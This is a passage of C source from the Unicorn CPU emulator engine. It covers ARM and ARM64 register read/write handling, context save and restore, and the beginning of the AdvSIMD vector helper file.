CHECK_REG_TYPE(uint64_t); env->xregs[29] = *(uint64_t *)value; break; case UC_ARM64_REG_X30: CHECK_REG_TYPE(uint64_t); env->xregs[30] = *(uint64_t *)value; break; case UC_ARM64_REG_PC: CHECK_REG_TYPE(uint64_t); env->pc = *(uint64_t *)value; *setpc = 1; break; case UC_ARM64_REG_SP: CHECK_REG_TYPE(uint64_t); env->xregs[31] = *(uint64_t *)value; break; case UC_ARM64_REG_NZCV: CHECK_REG_TYPE(uint32_t); cpsr_write(env, *(uint32_t *)value, CPSR_NZCV, CPSRWriteRaw); break; case UC_ARM64_REG_PSTATE: CHECK_REG_TYPE(uint32_t); pstate_write(env, *(uint32_t *)value); break; case UC_ARM64_REG_TTBR0_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.ttbr0_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_TTBR1_EL1: 
CHECK_REG_TYPE(uint64_t); env->cp15.ttbr1_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_PAR_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.par_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_MAIR_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.mair_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_CP_REG: CHECK_REG_TYPE(uc_arm64_cp_reg); ret = write_cp_reg(env, (uc_arm64_cp_reg *)value); arm_rebuild_hflags(env); break; case UC_ARM64_REG_FPCR: CHECK_REG_TYPE(uint32_t); vfp_set_fpcr(env, *(uint32_t *)value); break; case UC_ARM64_REG_FPSR: CHECK_REG_TYPE(uint32_t); vfp_set_fpsr(env, *(uint32_t *)value); break; } } return ret; } static int arm64_cpus_init(struct uc_struct *uc, const char *cpu_model) { ARMCPU *cpu; cpu = cpu_aarch64_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = arm64_set_pc; uc->get_pc = arm64_get_pc; uc->release = arm64_release; uc->cpus_init = arm64_cpus_init; uc->cpu_context_size = offsetof(CPUARMState, cpu_watchpoint); uc_common_init(uc); }

unicorn-2.1.1/qemu/target/arm/unicorn_arm.c

/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "qemu/typedefs.h" #include "unicorn/unicorn.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "cpu.h" #include "uc_priv.h" #include "unicorn_common.h" #include "unicorn.h" ARMCPU *cpu_arm_init(struct uc_struct *uc); static void arm_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUARMState *)uc->cpu->env_ptr)->pc = address; ((CPUARMState *)uc->cpu->env_ptr)->regs[15] = address & ~1; ((CPUARMState *)uc->cpu->env_ptr)->thumb = address & 1; } static uint64_t arm_get_pc(struct uc_struct *uc) { return ((CPUARMState *)uc->cpu->env_ptr)->regs[15] | ((CPUARMState *)uc->cpu->env_ptr)->thumb; } static void arm_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; ARMCPU *cpu = (ARMCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; ARMELChangeHook *entry, *next; CPUARMState *env = &cpu->env; uint32_t nr; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } QLIST_FOREACH_SAFE(entry, &cpu->pre_el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } QLIST_FOREACH_SAFE(entry, &cpu->el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } if (arm_feature(env, ARM_FEATURE_PMSA) && arm_feature(env, ARM_FEATURE_V7)) { nr = cpu->pmsav7_dregion; if (nr) { if (arm_feature(env, 
ARM_FEATURE_V8)) { g_free(env->pmsav8.rbar[M_REG_NS]); g_free(env->pmsav8.rlar[M_REG_NS]); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { g_free(env->pmsav8.rbar[M_REG_S]); g_free(env->pmsav8.rlar[M_REG_S]); } } else { g_free(env->pmsav7.drbar); g_free(env->pmsav7.drsr); g_free(env->pmsav7.dracr); } } } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { nr = cpu->sau_sregion; if (nr) { g_free(env->sau.rbar); g_free(env->sau.rlar); } } g_free(cpu->cpreg_indexes); g_free(cpu->cpreg_values); g_free(cpu->cpreg_vmstate_indexes); g_free(cpu->cpreg_vmstate_values); g_hash_table_destroy(cpu->cp_regs); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env; (void)uc; env = uc->cpu->env_ptr; memset(env->regs, 0, sizeof(env->regs)); env->pc = 0; } /* these functions are implemented in helper.c. */ #include "exec/helper-head.h" uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg); void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val); static uint32_t v7m_mrs_xpsr(CPUARMState *env, uint32_t reg) { uint32_t mask = 0; if (reg & 1) { mask |= XPSR_EXCP; /* IPSR (unpriv. reads as zero) */ } if (!(reg & 4)) { mask |= XPSR_NZCV | XPSR_Q; /* APSR */ if (arm_feature(env, ARM_FEATURE_THUMB_DSP)) { mask |= XPSR_GE; } } if (reg & 2) { mask |= (XPSR_IT_0_1 | XPSR_IT_2_7 | XPSR_T); /* EPSR */ } return xpsr_read(env) & mask; } static void v7m_msr_xpsr(CPUARMState *env, uint32_t mask, uint32_t reg, uint32_t val) { uint32_t xpsrmask = 0; if (reg & 1) { xpsrmask |= XPSR_EXCP; } if (!(reg & 4)) { if (mask & 8) { xpsrmask |= XPSR_NZCV | XPSR_Q; } if ((mask & 4) && arm_feature(env, ARM_FEATURE_THUMB_DSP)) { xpsrmask |= XPSR_GE; } } if (reg & 2) { xpsrmask |= (XPSR_IT_0_1 | XPSR_IT_2_7 | XPSR_T); } xpsr_write(env, val, xpsrmask); } static uc_err read_cp_reg(CPUARMState *env, uc_arm_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); int ns = cp->sec ? 0 : 1; const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_CP_REG(cp->cp, cp->is64, ns, cp->crn, cp->crm, cp->opc1, cp->opc2)); if (!ri) { return UC_ERR_ARG; } cp->val = read_raw_cp_reg(env, ri); if (!cp->is64) { cp->val = cp->val & 0xFFFFFFFF; } return UC_ERR_OK; } static uc_err write_cp_reg(CPUARMState *env, uc_arm_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); int ns = cp->sec ? 
0 : 1; const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_CP_REG(cp->cp, cp->is64, ns, cp->crn, cp->crm, cp->opc1, cp->opc2)); if (!ri) { return UC_ERR_ARG; } if (!cp->is64) { cp->val = cp->val & 0xFFFFFFFF; } if (ri->raw_writefn) { ri->raw_writefn(env, ri, cp->val); } else if (ri->writefn) { ri->writefn(env, ri, cp->val); } else { if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(env, ri) = cp->val; } else { CPREG_FIELD32(env, ri) = cp->val; } } return UC_ERR_OK; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->regs[regid - UC_ARM_REG_R0]; } else if (regid >= UC_ARM_REG_Q0 && regid <= UC_ARM_REG_Q15) { CHECK_REG_TYPE(uint64_t[2]); uint32_t reg_index = regid - UC_ARM_REG_Q0; *(uint64_t *)value = env->vfp.zregs[reg_index].d[0]; *(((uint64_t *)value) + 1) = env->vfp.zregs[reg_index].d[1]; } else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) { CHECK_REG_TYPE(uint64_t); uint32_t reg_index = regid - UC_ARM_REG_D0; *(uint64_t *)value = env->vfp.zregs[reg_index / 2].d[reg_index & 1]; } else if (regid >= UC_ARM_REG_S0 && regid <= UC_ARM_REG_S31) { CHECK_REG_TYPE(uint32_t); uint32_t reg_index = regid - UC_ARM_REG_S0; uint64_t reg_value = env->vfp.zregs[reg_index / 4].d[reg_index % 4 / 2]; if (reg_index % 2 == 0) { *(uint32_t *)value = (uint32_t)(reg_value & 0xffffffff); } else { *(uint32_t *)value = (uint32_t)(reg_value >> 32); } } else { switch (regid) { case UC_ARM_REG_APSR: if (arm_feature(env, ARM_FEATURE_M)) { CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 0); } else { CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpsr_read(env) & (CPSR_NZCV | CPSR_Q | CPSR_GE); } break; case UC_ARM_REG_APSR_NZCV: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpsr_read(env) & CPSR_NZCV; break; case UC_ARM_REG_CPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpsr_read(env); break; case UC_ARM_REG_SPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->spsr; break; // case UC_ARM_REG_SP: case UC_ARM_REG_R13: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[13]; break; // case UC_ARM_REG_LR: case UC_ARM_REG_R14: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[14]; break; // case UC_ARM_REG_PC: case UC_ARM_REG_R15: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[15]; break; case UC_ARM_REG_C1_C0_2: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->cp15.cpacr_el1; break; case UC_ARM_REG_C13_C0_3: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->cp15.tpidrro_el[0]; break; case UC_ARM_REG_FPEXC: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->vfp.xregs[ARM_VFP_FPEXC]; break; case UC_ARM_REG_FPSCR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = vfp_get_fpscr(env); break; case UC_ARM_REG_FPSID: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->vfp.xregs[ARM_VFP_FPSID]; break; case UC_ARM_REG_IPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 5); break; case UC_ARM_REG_MSP: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 8); break; case UC_ARM_REG_PSP: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 9); break; case UC_ARM_REG_IAPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 1); break; case UC_ARM_REG_EAPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 2); break; case UC_ARM_REG_XPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 3); break; 
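        /*
         * Reference note, derived from v7m_mrs_xpsr() above rather than
         * any external text: the low bits of the "reg" argument select
         * which xPSR views are merged into the result.
         *
         *     reg 0 -> APSR               reg 1 -> IAPSR (APSR|IPSR)
         *     reg 2 -> EAPSR (APSR|EPSR)  reg 3 -> XPSR  (all three)
         *     reg 5 -> IPSR               reg 6 -> EPSR
         *     reg 7 -> IEPSR (IPSR|EPSR)
         *
         * Bit 0 adds the exception number (IPSR), bit 1 adds the IT/T
         * bits (EPSR), and a clear bit 2 adds the flags (APSR).
         */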
case UC_ARM_REG_EPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 6); break; case UC_ARM_REG_IEPSR: CHECK_REG_TYPE(int32_t); *(int32_t *)value = v7m_mrs_xpsr(env, 7); break; case UC_ARM_REG_PRIMASK: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 16); break; case UC_ARM_REG_BASEPRI: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 17); break; case UC_ARM_REG_BASEPRI_MAX: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 18); break; case UC_ARM_REG_FAULTMASK: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 19); break; case UC_ARM_REG_CONTROL: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = helper_v7m_mrs(env, 20); break; case UC_ARM_REG_CP_REG: CHECK_REG_TYPE(uc_arm_cp_reg); ret = read_cp_reg(env, (uc_arm_cp_reg *)value); break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) { CHECK_REG_TYPE(uint32_t); env->regs[regid - UC_ARM_REG_R0] = *(uint32_t *)value; } else if (regid >= UC_ARM_REG_Q0 && regid <= UC_ARM_REG_Q15) { CHECK_REG_TYPE(uint64_t[2]); uint32_t reg_index = regid - UC_ARM_REG_Q0; env->vfp.zregs[reg_index].d[0] = *(uint64_t *)value; env->vfp.zregs[reg_index].d[1] = *(((uint64_t *)value) + 1); } else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) { CHECK_REG_TYPE(uint64_t); uint32_t reg_index = regid - UC_ARM_REG_D0; env->vfp.zregs[reg_index / 2].d[reg_index & 1] = *(uint64_t *)value; } else if (regid >= UC_ARM_REG_S0 && regid <= UC_ARM_REG_S31) { CHECK_REG_TYPE(uint32_t); uint32_t reg_index = regid - UC_ARM_REG_S0; uint64_t *p_reg_value = &env->vfp.zregs[reg_index / 4].d[reg_index % 4 / 2]; uint64_t in_value = *((uint32_t *)value); if (reg_index % 2 == 0) { in_value |= *p_reg_value & 0xffffffff00000000ul; } else { in_value = (in_value << 32) | (*p_reg_value & 0xfffffffful); } *p_reg_value = in_value; } else { switch (regid) { case UC_ARM_REG_APSR: CHECK_REG_TYPE(uint32_t); if (!arm_feature(env, ARM_FEATURE_M)) { cpsr_write(env, *(uint32_t *)value, (CPSR_NZCV | CPSR_Q | CPSR_GE), CPSRWriteByUnicorn); arm_rebuild_hflags(env); } else { // Same with UC_ARM_REG_APSR_NZCVQ v7m_msr_xpsr(env, 0b1000, 0, *(uint32_t *)value); } break; case UC_ARM_REG_APSR_NZCV: CHECK_REG_TYPE(uint32_t); cpsr_write(env, *(uint32_t *)value, CPSR_NZCV, CPSRWriteByUnicorn); arm_rebuild_hflags(env); break; case UC_ARM_REG_CPSR: CHECK_REG_TYPE(uint32_t); cpsr_write(env, *(uint32_t *)value, ~0, CPSRWriteByUnicorn); arm_rebuild_hflags(env); break; case UC_ARM_REG_SPSR: CHECK_REG_TYPE(uint32_t); env->spsr = *(uint32_t *)value; break; // case UC_ARM_REG_SP: case UC_ARM_REG_R13: CHECK_REG_TYPE(uint32_t); env->regs[13] = *(uint32_t *)value; break; // case UC_ARM_REG_LR: case UC_ARM_REG_R14: CHECK_REG_TYPE(uint32_t); env->regs[14] = *(uint32_t *)value; break; // case UC_ARM_REG_PC: case UC_ARM_REG_R15: CHECK_REG_TYPE(uint32_t); env->pc = (*(uint32_t *)value & ~1); env->thumb = (*(uint32_t *)value & 1); env->uc->thumb = (*(uint32_t *)value & 1); env->regs[15] = (*(uint32_t *)value & ~1); *setpc = 1; break; // case UC_ARM_REG_C1_C0_2: // env->cp15.c1_coproc = *(int32_t *)value; // break; case UC_ARM_REG_C13_C0_3: CHECK_REG_TYPE(int32_t); env->cp15.tpidrro_el[0] = *(int32_t *)value; break; case UC_ARM_REG_FPEXC: CHECK_REG_TYPE(int32_t); env->vfp.xregs[ARM_VFP_FPEXC] = *(int32_t *)value; break; case UC_ARM_REG_FPSCR: 
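            /*
             * Host-side usage sketch, not part of this file (assumes
             * only the public Unicorn API; the value is hypothetical).
             * Forcing round-towards-zero means setting FPSCR.RMode
             * (bits 23:22) to 0b11:
             *
             *     uint32_t fpscr;
             *     uc_reg_read(uc, UC_ARM_REG_FPSCR, &fpscr);
             *     fpscr |= 3u << 22;   // RMode = round to zero
             *     uc_reg_write(uc, UC_ARM_REG_FPSCR, &fpscr);
             *
             * vfp_set_fpscr() (see vfp_helper.c) then propagates
             * RMode/FZ/DN into the softfloat float_status fields.
             */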
            CHECK_REG_TYPE(int32_t);
            vfp_set_fpscr(env, *(int32_t *)value);
            break;
        case UC_ARM_REG_FPSID:
            CHECK_REG_TYPE(int32_t);
            env->vfp.xregs[ARM_VFP_FPSID] = *(int32_t *)value;
            break;
        case UC_ARM_REG_IPSR:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1000, 5, *(uint32_t *)value);
            break;
        case UC_ARM_REG_MSP:
            CHECK_REG_TYPE(uint32_t);
            helper_v7m_msr(env, 8, *(uint32_t *)value);
            break;
        case UC_ARM_REG_PSP:
            CHECK_REG_TYPE(uint32_t);
            helper_v7m_msr(env, 9, *(uint32_t *)value);
            break;
        case UC_ARM_REG_CONTROL:
            CHECK_REG_TYPE(uint32_t);
            helper_v7m_msr(env, 20, *(uint32_t *)value);
            break;
        case UC_ARM_REG_EPSR:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1000, 6, *(uint32_t *)value);
            break;
        case UC_ARM_REG_IEPSR:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1000, 7, *(uint32_t *)value);
            break;
        case UC_ARM_REG_PRIMASK:
            CHECK_REG_TYPE(uint32_t);
            helper_v7m_msr(env, 16, *(uint32_t *)value);
            break;
        case UC_ARM_REG_BASEPRI:
            CHECK_REG_TYPE(uint32_t);
            helper_v7m_msr(env, 17, *(uint32_t *)value);
            break;
        case UC_ARM_REG_BASEPRI_MAX:
            CHECK_REG_TYPE(uint32_t);
            helper_v7m_msr(env, 18, *(uint32_t *)value);
            break;
        case UC_ARM_REG_FAULTMASK:
            CHECK_REG_TYPE(uint32_t);
            helper_v7m_msr(env, 19, *(uint32_t *)value);
            break;
        case UC_ARM_REG_APSR_NZCVQ:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1000, 0, *(uint32_t *)value);
            break;
        case UC_ARM_REG_APSR_G:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b0100, 0, *(uint32_t *)value);
            break;
        case UC_ARM_REG_APSR_NZCVQG:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1100, 0, *(uint32_t *)value);
            break;
        case UC_ARM_REG_IAPSR:
        case UC_ARM_REG_IAPSR_NZCVQ:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1000, 1, *(uint32_t *)value);
            break;
        case UC_ARM_REG_IAPSR_G:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b0100, 1, *(uint32_t *)value);
            break;
        case UC_ARM_REG_IAPSR_NZCVQG:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1100, 1, *(uint32_t *)value);
            break;
        case UC_ARM_REG_EAPSR:
        case UC_ARM_REG_EAPSR_NZCVQ:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1000, 2, *(uint32_t *)value);
            break;
        case UC_ARM_REG_EAPSR_G:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b0100, 2, *(uint32_t *)value);
            break;
        case UC_ARM_REG_EAPSR_NZCVQG:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1100, 2, *(uint32_t *)value);
            break;
        case UC_ARM_REG_XPSR:
        case UC_ARM_REG_XPSR_NZCVQ:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1000, 3, *(uint32_t *)value);
            break;
        case UC_ARM_REG_XPSR_G:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b0100, 3, *(uint32_t *)value);
            break;
        case UC_ARM_REG_XPSR_NZCVQG:
            CHECK_REG_TYPE(uint32_t);
            v7m_msr_xpsr(env, 0b1100, 3, *(uint32_t *)value);
            break;
        case UC_ARM_REG_CP_REG:
            CHECK_REG_TYPE(uc_arm_cp_reg);
            ret = write_cp_reg(env, (uc_arm_cp_reg *)value);
            arm_rebuild_hflags(env);
            break;
        }
    }

    return ret;
}

static bool arm_stop_interrupt(struct uc_struct *uc, int intno)
{
    switch (intno) {
    default:
        return false;
    case EXCP_UDEF:
    case EXCP_YIELD:
        return true;
    case EXCP_INVSTATE:
        uc->invalid_error = UC_ERR_EXCEPTION;
        return true;
    }
}

static uc_err arm_query(struct uc_struct *uc, uc_query_type type,
                        size_t *result)
{
    CPUState *mycpu = uc->cpu;
    uint32_t mode;

    switch (type) {
    case UC_QUERY_MODE:
        // zero out ARM/THUMB mode
        mode = uc->mode & ~(UC_MODE_ARM | UC_MODE_THUMB);
        // THUMB mode or ARM mode
        mode |= ((ARM_CPU(mycpu)->env.thumb != 0) ?
UC_MODE_THUMB : UC_MODE_ARM); *result = mode; return UC_ERR_OK; default: return UC_ERR_ARG; } } static bool arm_opcode_hook_invalidate(uint32_t op, uint32_t flags) { if (op != UC_TCG_OP_SUB) { return false; } if (flags == UC_TCG_OP_FLAG_CMP && op != UC_TCG_OP_SUB) { return false; } return true; } static int arm_cpus_init(struct uc_struct *uc, const char *cpu_model) { ARMCPU *cpu; cpu = cpu_arm_init(uc); if (cpu == NULL) { return -1; } return 0; } static size_t uc_arm_context_size(struct uc_struct *uc) { size_t ret = offsetof(CPUARMState, cpu_watchpoint); ARMCPU *cpu = (ARMCPU *)uc->cpu; CPUARMState *env = (CPUARMState *)&cpu->env; uint32_t nr; #define ARM_ENV_CHECK(field) \ if (field) { \ ret += sizeof(uint32_t) * (nr + 1); \ } else { \ ret += sizeof(uint32_t); \ } // /* PMSAv7 MPU */ // struct { // uint32_t *drbar; // uint32_t *drsr; // uint32_t *dracr; // uint32_t rnr[M_REG_NUM_BANKS]; // } pmsav7; // /* PMSAv8 MPU */ // struct { // /* The PMSAv8 implementation also shares some PMSAv7 config // * and state: // * pmsav7.rnr (region number register) // * pmsav7_dregion (number of configured regions) // */ // uint32_t *rbar[M_REG_NUM_BANKS]; // uint32_t *rlar[M_REG_NUM_BANKS]; // uint32_t mair0[M_REG_NUM_BANKS]; // uint32_t mair1[M_REG_NUM_BANKS]; // } pmsav8; nr = cpu->pmsav7_dregion; ARM_ENV_CHECK(env->pmsav7.drbar) ARM_ENV_CHECK(env->pmsav7.drsr) ARM_ENV_CHECK(env->pmsav7.dracr) ARM_ENV_CHECK(env->pmsav8.rbar[M_REG_NS]) ARM_ENV_CHECK(env->pmsav8.rbar[M_REG_S]) ARM_ENV_CHECK(env->pmsav8.rlar[M_REG_NS]) ARM_ENV_CHECK(env->pmsav8.rlar[M_REG_S]) // /* v8M SAU */ // struct { // uint32_t *rbar; // uint32_t *rlar; // uint32_t rnr; // uint32_t ctrl; // } sau; nr = cpu->sau_sregion; ARM_ENV_CHECK(env->sau.rbar) ARM_ENV_CHECK(env->sau.rlar) #undef ARM_ENV_CHECK // These fields are never used: // void *nvic; // const struct arm_boot_info *boot_info; // void *gicv3state; return ret; } static uc_err uc_arm_context_save(struct uc_struct *uc, uc_context *context) { char *p = NULL; ARMCPU *cpu = (ARMCPU *)uc->cpu; CPUARMState *env = (CPUARMState *)&cpu->env; uint32_t nr = 0; #define ARM_ENV_SAVE(field) \ if (!field) { \ *(uint32_t *)p = 0; \ p += sizeof(uint32_t); \ } else { \ *(uint32_t *)p = nr; \ p += sizeof(uint32_t); \ memcpy(p, (void *)field, sizeof(uint32_t) * nr); \ p += sizeof(uint32_t) * nr; \ } p = context->data; memcpy(p, uc->cpu->env_ptr, uc->cpu_context_size); p += uc->cpu_context_size; nr = cpu->pmsav7_dregion; ARM_ENV_SAVE(env->pmsav7.drbar) ARM_ENV_SAVE(env->pmsav7.drsr) ARM_ENV_SAVE(env->pmsav7.dracr) ARM_ENV_SAVE(env->pmsav8.rbar[M_REG_NS]) ARM_ENV_SAVE(env->pmsav8.rbar[M_REG_S]) ARM_ENV_SAVE(env->pmsav8.rlar[M_REG_NS]) ARM_ENV_SAVE(env->pmsav8.rlar[M_REG_S]) nr = cpu->sau_sregion; ARM_ENV_SAVE(env->sau.rbar) ARM_ENV_SAVE(env->sau.rlar) #undef ARM_ENV_SAVE return UC_ERR_OK; } static uc_err uc_arm_context_restore(struct uc_struct *uc, uc_context *context) { char *p = NULL; ARMCPU *cpu = (ARMCPU *)uc->cpu; CPUARMState *env = (CPUARMState *)&cpu->env; uint32_t nr, ctx_nr; #define ARM_ENV_RESTORE(field) \ ctx_nr = *(uint32_t *)p; \ if (ctx_nr != 0) { \ p += sizeof(uint32_t); \ if (field && ctx_nr == nr) { \ memcpy(field, p, sizeof(uint32_t) * ctx_nr); \ } \ p += sizeof(uint32_t) * ctx_nr; \ } else { \ p += sizeof(uint32_t); \ } p = context->data; memcpy(uc->cpu->env_ptr, p, uc->cpu_context_size); p += uc->cpu_context_size; nr = cpu->pmsav7_dregion; ARM_ENV_RESTORE(env->pmsav7.drbar) ARM_ENV_RESTORE(env->pmsav7.drsr) ARM_ENV_RESTORE(env->pmsav7.dracr) 
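    /*
     * Layout note, restating ARM_ENV_SAVE/ARM_ENV_RESTORE above (it is
     * not a separate on-disk format): each dynamically-allocated
     * MPU/SAU field is serialized as
     *
     *     +--------+-----------------------------+
     *     | u32 nr | nr x u32 payload, if nr > 0 |
     *     +--------+-----------------------------+
     *
     * with a single zero u32 standing in for a NULL field. On restore
     * the payload is copied back only when the live pointer exists and
     * the saved count matches the current region count; otherwise the
     * bytes are skipped.
     */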
    ARM_ENV_RESTORE(env->pmsav8.rbar[M_REG_NS])
    ARM_ENV_RESTORE(env->pmsav8.rbar[M_REG_S])
    ARM_ENV_RESTORE(env->pmsav8.rlar[M_REG_NS])
    ARM_ENV_RESTORE(env->pmsav8.rlar[M_REG_S])

    nr = cpu->sau_sregion;
    ARM_ENV_RESTORE(env->sau.rbar)
    ARM_ENV_RESTORE(env->sau.rlar)

#undef ARM_ENV_RESTORE

    return UC_ERR_OK;
}

DEFAULT_VISIBILITY
void uc_init(struct uc_struct *uc)
{
    uc->reg_read = reg_read;
    uc->reg_write = reg_write;
    uc->reg_reset = reg_reset;
    uc->set_pc = arm_set_pc;
    uc->get_pc = arm_get_pc;
    uc->stop_interrupt = arm_stop_interrupt;
    uc->release = arm_release;
    uc->query = arm_query;
    uc->cpus_init = arm_cpus_init;
    uc->opcode_hook_invalidate = arm_opcode_hook_invalidate;
    uc->cpu_context_size = offsetof(CPUARMState, cpu_watchpoint);
    uc->context_size = uc_arm_context_size;
    uc->context_save = uc_arm_context_save;
    uc->context_restore = uc_arm_context_restore;
    uc_common_init(uc);
}
unicorn-2.1.1/qemu/target/arm/vec_helper.c
/*
 * ARM AdvSIMD / SVE Vector Operations
 *
 * Copyright (c) 2018 Linaro
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"
#include "tcg/tcg-gvec-desc.h"
#include "fpu/softfloat.h"

/* Note that vector data is stored in host-endian 64-bit chunks,
   so addressing units smaller than that needs a host-endian fixup.
*/ #ifdef HOST_WORDS_BIGENDIAN #define H1(x) ((x) ^ 7) #define H2(x) ((x) ^ 3) #define H4(x) ((x) ^ 1) #else #define H1(x) (x) #define H2(x) (x) #define H4(x) (x) #endif #define SET_QC() env->vfp.qc[0] = 1 static void clear_tail(void *vd, uintptr_t opr_sz, uintptr_t max_sz) { uint64_t *d = (uint64_t *)((char *)vd + opr_sz); uintptr_t i; for (i = opr_sz; i < max_sz; i += 8) { *d++ = 0; } } /* Signed saturating rounding doubling multiply-accumulate high half, 16-bit */ static uint16_t inl_qrdmlah_s16(CPUARMState *env, int16_t src1, int16_t src2, int16_t src3) { /* Simplify: * = ((a3 << 16) + ((e1 * e2) << 1) + (1 << 15)) >> 16 * = ((a3 << 15) + (e1 * e2) + (1 << 14)) >> 15 */ int32_t ret = (int32_t)src1 * src2; ret = ((int32_t)src3 << 15) + ret + (1 << 14); ret >>= 15; if (ret != (int16_t)ret) { SET_QC(); ret = (ret < 0 ? -0x8000 : 0x7fff); } return ret; } uint32_t HELPER(neon_qrdmlah_s16)(CPUARMState *env, uint32_t src1, uint32_t src2, uint32_t src3) { uint16_t e1 = inl_qrdmlah_s16(env, src1, src2, src3); uint16_t e2 = inl_qrdmlah_s16(env, src1 >> 16, src2 >> 16, src3 >> 16); return deposit32(e1, 16, 16, e2); } void HELPER(gvec_qrdmlah_s16)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int16_t *d = vd; int16_t *n = vn; int16_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 